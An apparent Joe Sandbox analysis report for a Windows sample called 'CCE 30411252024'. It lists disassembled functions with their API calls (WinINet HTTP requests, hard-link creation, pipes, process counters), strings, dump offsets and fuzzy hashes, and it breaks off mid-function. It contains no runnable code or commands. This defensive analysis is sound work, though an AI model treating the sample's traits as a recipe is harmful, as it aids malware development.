                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                        • _memset.LIBCMT ref: 00F25438
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00F25467
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F25513
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F2553D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: 4b4a9c39a42dc34043d10f767ca21c873ef91ead46eb295c8d12b64ca3f1bc11
                                                                                        • Instruction ID: a75f1f48f075bca2b3923d52b5cdae768ca3cdefc047c3951676a20840a5bf16
                                                                                        • Opcode Fuzzy Hash: 4b4a9c39a42dc34043d10f767ca21c873ef91ead46eb295c8d12b64ca3f1bc11
                                                                                        • Instruction Fuzzy Hash: 40512272A047219BD310EF28E84277BB7E9EF85B64F08162AF895D31D0DBB0CD44A752
                                                                                        Function 00F20213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2027B
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F202B1
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F202C2
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F20344
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 97bdd37274a9d7ecaad8426a7bcd4f8e650b5c4a974648d3daa194493543a7b9
                                                                                        • Instruction ID: 13095244ddf702a112534509afd0e137e9fdb2e956a1e0c0d1a76ee45ae74bdc
                                                                                        • Opcode Fuzzy Hash: 97bdd37274a9d7ecaad8426a7bcd4f8e650b5c4a974648d3daa194493543a7b9
                                                                                        • Instruction Fuzzy Hash: 1F415B72A00224EFDB05CF54D8C5B9A7BB9EF48314B1480A9E909DF247DBB5DD44EBA0
                                                                                        Function 00F25007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F25075
                                                                                        • GetMenuItemInfoW.USER32 ref: 00F25091
                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00F250D7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FA1708,00000000), ref: 00F25120
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: 8c0512b8b799e06d26248f337f0128347b4dda6801e7077f928449cc88d5bd6f
                                                                                        • Instruction ID: 799475033b7677df2386c37f1a8fd18a0c591fdcef489b2d4916bfaa659ee6d7
                                                                                        • Opcode Fuzzy Hash: 8c0512b8b799e06d26248f337f0128347b4dda6801e7077f928449cc88d5bd6f
                                                                                        • Instruction Fuzzy Hash: 7C41F3316057119FD720DF28EC80B2BB7E4AF85B24F044A6EF865972D1D770E814DB62
                                                                                        Function 00F2E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F2E742
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00F2E768
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F2E78D
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F2E7B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID: p1#v`K$v
                                                                                        • API String ID: 3321077145-1068180069
                                                                                        • Opcode ID: 8b6b0d32459b0026647445d45790c052d7d97d20a063ccceef441d6f09e0e64e
                                                                                        • Instruction ID: c2f53034273b2f75a0cb5ceda41115d9cb08954c2e048479d7191ad512b9889d
                                                                                        • Opcode Fuzzy Hash: 8b6b0d32459b0026647445d45790c052d7d97d20a063ccceef441d6f09e0e64e
                                                                                        • Instruction Fuzzy Hash: 79416639600614DFCF11EF56D444A5DBBE5BF89720B198098EA16AB3A2CB70FC00DB81
                                                                                        Function 00F40567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00F40587
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 2358735015-567219261
                                                                                        • Opcode ID: 13305b5218544e08783ed3f0e9265550234f5ac627afacdaf8a18fd45f0ab39b
                                                                                        • Instruction ID: ada10ffe74cf4dcd69e5aa3903aa02c56e5cf974f6146594ef28dd3882182574
                                                                                        • Opcode Fuzzy Hash: 13305b5218544e08783ed3f0e9265550234f5ac627afacdaf8a18fd45f0ab39b
                                                                                        • Instruction Fuzzy Hash: 6231833190015AABCF00EF58CD519AEB7B4FF54324B104629E926B76D1DB71E916DB80
                                                                                        Function 00F1B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F1B88E
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F1B8A1
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F1B8D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: d0811e658f7d3780b585f96757dd912c8d2fe42e533f407f57cc9d5656e60eaf
                                                                                        • Instruction ID: a55677d2b60756cf30838bbd5b7864c5c718822e33ac4f7118b12b0180fa90ce
                                                                                        • Opcode Fuzzy Hash: d0811e658f7d3780b585f96757dd912c8d2fe42e533f407f57cc9d5656e60eaf
                                                                                        • Instruction Fuzzy Hash: 4B21EF72E00108BFDB08ABA5DC869FE77BDDF15760B104129F025A21E0DBB94D4BA660
                                                                                        Function 00EE51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00EE522F
                                                                                        • _wcscpy.LIBCMT ref: 00EE5283
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE5293
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F53CB0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 1053898822-1585850449
                                                                                        • Opcode ID: b59c38593aa3054f324ab4d84991516032438c6e46448802ed5038e969b0d292
                                                                                        • Instruction ID: 236e2fd8d7c7f6dc2be7a517d2bfe87348c8fa7685135117808dbeea302ca971
                                                                                        • Opcode Fuzzy Hash: b59c38593aa3054f324ab4d84991516032438c6e46448802ed5038e969b0d292
                                                                                        • Instruction Fuzzy Hash: 2831E4724087886EC720EB51EC42FDF77E8AF45354F00551AF685A21A1EF70A648DB92
                                                                                        Function 00F343E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F34401
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F34427
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F34457
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F3449E
                                                                                          • Part of subcall function 00F35052: GetLastError.KERNEL32(?,?,00F343CC,00000000,00000000,00000001), ref: 00F35067
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 1951874230-3916222277
                                                                                        • Opcode ID: 3351bfb1be9193cb69bfe5cb0322536d952d88429d3c2940bd0bff7c1c0e700e
                                                                                        • Instruction ID: 43b3fa36dd258cdcc90800aeaa1a616a9a5d5b000b0acd208484ebed11d82d64
                                                                                        • Opcode Fuzzy Hash: 3351bfb1be9193cb69bfe5cb0322536d952d88429d3c2940bd0bff7c1c0e700e
                                                                                        • Instruction Fuzzy Hash: 002192B2A00208BFE711DF54CC85FBF76ECEB48768F10842AF905D6140DA65AD05B771
                                                                                        Function 00F490E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
                                                                                          • Part of subcall function 00EFD17C: GetStockObject.GDI32(00000011), ref: 00EFD1CE
                                                                                          • Part of subcall function 00EFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F4915C
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00F49163
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F49178
                                                                                        • DestroyWindow.USER32(?), ref: 00F49180
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: 0893a0e49f6ffc3b2e3e5b31aa29cfc8630b3bd13afd55201148407921211842
                                                                                        • Instruction ID: 463aa4b69d096a3c5cec2f32c6943afb8ad0033bce7cc825a632a97dd2fdff4c
                                                                                        • Opcode Fuzzy Hash: 0893a0e49f6ffc3b2e3e5b31aa29cfc8630b3bd13afd55201148407921211842
                                                                                        • Instruction Fuzzy Hash: DC215E71B0820ABBEF208E64DC85EBB3BA9EF99374F100619FD5492190D7B2DC51B760
                                                                                        Function 00F29568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00F29588
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F295B9
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00F295CB
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F29605
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: 3d432f95a6bac7a57c082e111f89b1027c3679c1c8ed009881e7ee65acf601ef
                                                                                        • Instruction ID: e29d1affd4410b3169f77f77b0e33f44b9aab7e0d9076cab2e42a103c11559d8
                                                                                        • Opcode Fuzzy Hash: 3d432f95a6bac7a57c082e111f89b1027c3679c1c8ed009881e7ee65acf601ef
                                                                                        • Instruction Fuzzy Hash: 6C219571B042199BEB119F65EC06A9A77F4AF45720F244A19F8A1D72D0D7F0D940EB50
                                                                                        Function 00F29634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00F29653
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F29683
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00F29694
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F296CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: 215a7f813023d19e13a2baa974da226f2062332b4d2746d04ba8652bab9e24aa
                                                                                        • Instruction ID: 33efd262959e91491af7cbe29515fd7bd0f538fb7efdbfd38e2dc0ad4631fab5
                                                                                        • Opcode Fuzzy Hash: 215a7f813023d19e13a2baa974da226f2062332b4d2746d04ba8652bab9e24aa
                                                                                        • Instruction Fuzzy Hash: 91219871A042259BDB209F69AC54E9A7BE8AF45730F200A19FDB1E72D0D7F4D841EB50
                                                                                        Function 00F2DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F2DB0A
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F2DB5E
                                                                                        • __swprintf.LIBCMT ref: 00F2DB77
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F7DC00), ref: 00F2DBB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 651388b5cb89264812bac3c789c8087e49f621d7846273f3bd1ffbfef6621708
                                                                                        • Instruction ID: 2a5f252f40a53e60c87579d19657b32afc3941e74802932fb0c44d142d4302ab
                                                                                        • Opcode Fuzzy Hash: 651388b5cb89264812bac3c789c8087e49f621d7846273f3bd1ffbfef6621708
                                                                                        • Instruction Fuzzy Hash: C8218335A0014CAFDB10EF65DD85DAEB7F8EF89704B104069F509E7251DB71EA01EB61
                                                                                        Function 00F1C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F1C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F1C84A
                                                                                          • Part of subcall function 00F1C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1C85D
                                                                                          • Part of subcall function 00F1C82D: GetCurrentThreadId.KERNEL32 ref: 00F1C864
                                                                                          • Part of subcall function 00F1C82D: AttachThreadInput.USER32(00000000), ref: 00F1C86B
                                                                                        • GetFocus.USER32 ref: 00F1CA05
                                                                                          • Part of subcall function 00F1C876: GetParent.USER32(?), ref: 00F1C884
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00F1CA4E
                                                                                        • EnumChildWindows.USER32(?,00F1CAC4), ref: 00F1CA76
                                                                                        • __swprintf.LIBCMT ref: 00F1CA90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 3187004680-1110647743
                                                                                        • Opcode ID: ff58b2832b3a2a2719d7d810e51f3decc525001bf6092cc6b4edb6c9030b81cb
                                                                                        • Instruction ID: 96615f3262dba7355a3ea5aa58157b52853204ad2b4db9e4d795c10cabd81f34
                                                                                        • Opcode Fuzzy Hash: ff58b2832b3a2a2719d7d810e51f3decc525001bf6092cc6b4edb6c9030b81cb
                                                                                        • Instruction Fuzzy Hash: F5117271A402097BDB11BF60DCD5FE93778AF54714F008066FA1CAA182CB749585EBB1
                                                                                        Function 00F41945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F419F3
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F41A26
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F41B49
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F41BBF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: 04752bd66f6dcc45dca56dfca296e4413128d0826d0b8a689d059c5f8261c4d9
                                                                                        • Instruction ID: 1d1300bf68c34a8d70599efe610b5e85ece7a52ae990c65fd8932f1825f36039
                                                                                        • Opcode Fuzzy Hash: 04752bd66f6dcc45dca56dfca296e4413128d0826d0b8a689d059c5f8261c4d9
                                                                                        • Instruction Fuzzy Hash: 7F815171A00218EBDF109F64C886BADBBE5FF48720F148459FA15BF3C2D7B5A9419B90
                                                                                        Function 00F4E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F4E1D5
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4E20D
                                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 00F4E248
